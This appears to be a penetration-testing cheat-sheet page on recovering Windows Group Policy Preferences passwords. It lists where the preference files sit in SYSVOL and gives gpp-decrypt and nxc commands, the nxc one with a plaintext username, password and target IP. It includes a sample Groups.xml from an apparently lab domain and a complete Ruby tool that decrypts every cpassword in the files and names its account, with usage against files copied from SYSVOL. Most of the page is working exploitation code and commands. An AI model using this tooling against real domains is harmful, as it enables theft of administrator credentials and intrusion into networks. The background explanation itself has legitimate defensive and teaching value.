GPP Password
In older Windows domain environments, Group Policy Preferences (GPP) let administrators set local account passwords in bulk (for example, the built-in Administrator on every workstation). The password is stored in the cpassword attribute of the preference XML, AES-256 encrypted with a key that Microsoft published in its own documentation, so anyone who can read the file can decrypt it. MS14-025 (2014) removed the ability to create new password entries but does not delete existing ones: a Groups.xml written before the patch stays in SYSVOL, readable by every domain user, until an administrator removes it.
Windows Local Privilege Escalation - HackTricks
Deep Dive into Kerberoasting Attack
1. Exploitation
Find the preference files
# search these directories (local cache on a machine that applied the GPO)
C:\ProgramData\Microsoft\Group Policy\history
C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history   # before Windows Vista
# the originals live on the DC in SYSVOL, which any domain user can read:
\\<domain>\SYSVOL\<domain>\Policies\{<GPO GUID>}\Machine\Preferences\   (or User\Preferences\)
# the cpassword is usually in one of these files
Groups.xml
Services.xml
Scheduledtasks.xml
DataSources.xml
Printers.xml
Drives.xml
Decrypt the cpassword. gpp-decrypt has been known to give an incorrect result for some values (example: Heron > 1.6. GPP Password), so cross-check with a second tool before using the password.
gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw   # with gpp-decrypt
nxc smb 172.16.10.100 -u samuel.davies -p l6fkiy9oN -M gpp_password   # nxc module: needs valid domain creds, reads SYSVOL and decrypts every cpassword it finds
Example (Groups.xml). The cpassword sits on the User element; newName="_local" means the same GPO renames the built-in Administrator, so the decrypted password belongs to the account _local on the machines that applied the policy.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <Group clsid="{6D4A79E4-529C-4481-ABD0-F5BD7EA93BA7}" name="Administrators (built-in)" image="2" changed="2024-06-04 15:59:45" uid="{535B586D-9541-4420-8E32-224F589E4F3A}">
    <Properties action="U" newName="" description="" deleteAllUsers="0" deleteAllGroups="0" removeAccounts="0" groupSid="S-1-5-32-544" groupName="Administrators (built-in)">
      <Members>
        <Member name="HERON\svc-web-accounting" action="ADD" sid="S-1-5-21-1568358163-2901064146-3316491674-24602"/>
        <Member name="HERON\svc-web-accounting-d" action="ADD" sid="S-1-5-21-1568358163-2901064146-3316491674-26101"/>
      </Members>
    </Properties>
  </Group>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2024-06-04 16:00:13" uid="{F3B0115E-D062-46CC-B10C-C3EB743C824A}">
    <Properties action="U" newName="_local" fullName="" description="local administrator" cpassword="1G19pP9gbIPUr5xLeKhEUg==" changeLogon="0" noChange="0" neverExpires="1" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
  </User>
</Groups>
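A worked decryptor, added here as an example; it is not code from this page, from gpp-decrypt or from nxc. It shows what those tools do with the file above: restore the base64 padding Windows strips from cpassword, decrypt with the published key (AES-256-CBC, all-zero IV, PKCS#7 padding), decode the UTF-16LE plaintext, and scan any preference XML for every element that carries a cpassword. The sample XML, the password P@ssw0rd!, the encrypt helper used to build it offline and the function names are constructed for this example. The list of attributes that name the account (userName in Groups.xml and Drives.xml, runAs in ScheduledTasks.xml, accountName in Services.xml, username in DataSources.xml and Printers.xml) is an assumption from the file formats, not something the page states.

```ruby
# Added example: decrypt GPP cpassword values and pull them out of preference XML.
# Not code from the page, gpp-decrypt or nxc.
require 'openssl'
require 'base64'

# AES-256 key published by Microsoft in the GPP documentation (MS-GPPREF,
# "Password Encryption"). It is the same on every domain; the IV is all zeros.
GPP_KEY = ['4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b'].pack('H*').freeze
GPP_IV  = ("\x00" * 16).b.freeze

# cpassword -> plaintext. Windows writes the base64 without '=' padding, so it is
# restored first. Plaintext is UTF-16LE, which is why even a one-character
# password decrypts to a full 16-byte block. Garbage input raises CipherError.
def gpp_decrypt(cpassword)
  b64 = cpassword + '=' * ((4 - cpassword.length % 4) % 4)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.decrypt
  cipher.key = GPP_KEY
  cipher.iv  = GPP_IV
  plain = cipher.update(Base64.strict_decode64(b64)) + cipher.final
  plain.force_encoding('UTF-16LE').encode('UTF-8')
end

# Inverse of gpp_decrypt: the transform GPP applied when the policy was saved.
# Used here only to build a known sample offline (constructed helper).
def gpp_encrypt(password)
  cipher = OpenSSL::Cipher.new('aes-256-cbc')
  cipher.encrypt
  cipher.key = GPP_KEY
  cipher.iv  = GPP_IV
  ct = cipher.update(password.encode('UTF-16LE').b) + cipher.final
  Base64.strict_encode64(ct).delete('=')
end

# Attribute that names the account differs per file (assumption from the file
# formats: userName in Groups/Drives, runAs in ScheduledTasks, accountName in
# Services, username in DataSources/Printers).
ACCOUNT_ATTRS = %w[userName runAs accountName username].freeze

# GPP XML is machine-written with double-quoted attributes, so a tag scanner is
# enough here; a production tool should use a real XML parser.
TAG_WITH_CPASSWORD = /<\w+\b[^>]*\bcpassword="[^"]*"[^>]*\/?>/
ATTR = /(\w+)="([^"]*)"/

# Returns one hash per element carrying a cpassword: file, account, password.
def extract_gpp_passwords(xml_text, file_name = 'Groups.xml')
  xml_text.scan(TAG_WITH_CPASSWORD).each_with_object([]) do |tag, out|
    attrs = tag.scan(ATTR).to_h
    cp = attrs['cpassword']
    next if cp.nil? || cp.empty?
    account = ACCOUNT_ATTRS.map { |a| attrs[a] }.compact.first
    # newName on a User element means the same GPO renames the account, so the
    # password belongs to the new name on the target machines.
    new_name = attrs['newName']
    account = "#{account} (renamed to #{new_name})" unless new_name.to_s.empty?
    out << { file: file_name, account: account, password: gpp_decrypt(cp) }
  end
end

# Constructed sample in the shape of a real Groups.xml; the cpassword is
# generated from the constructed password P@ssw0rd!.
SAMPLE_GROUPS_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
    <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)">
      <Properties action="U" newName="_local" cpassword="#{gpp_encrypt('P@ssw0rd!')}"
                  subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
    </User>
  </Groups>
XML

if __FILE__ == $PROGRAM_NAME
  # usage: ruby gpp.rb <file pulled from SYSVOL>   (no argument: the sample above)
  xml = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_GROUPS_XML
  extract_gpp_passwords(xml, ARGV[0] || 'sample').each do |r|
    puts "#{r[:file]}: #{r[:account]} => #{r[:password]}"
  end
end
```

Point it at the Groups.xml (or ScheduledTasks.xml, Services.xml, ...) copied out of SYSVOL and compare the output with what gpp-decrypt and the nxc module report; if two tools disagree, the one that honours the UTF-16LE decoding and the padding restoration above is the one to trust.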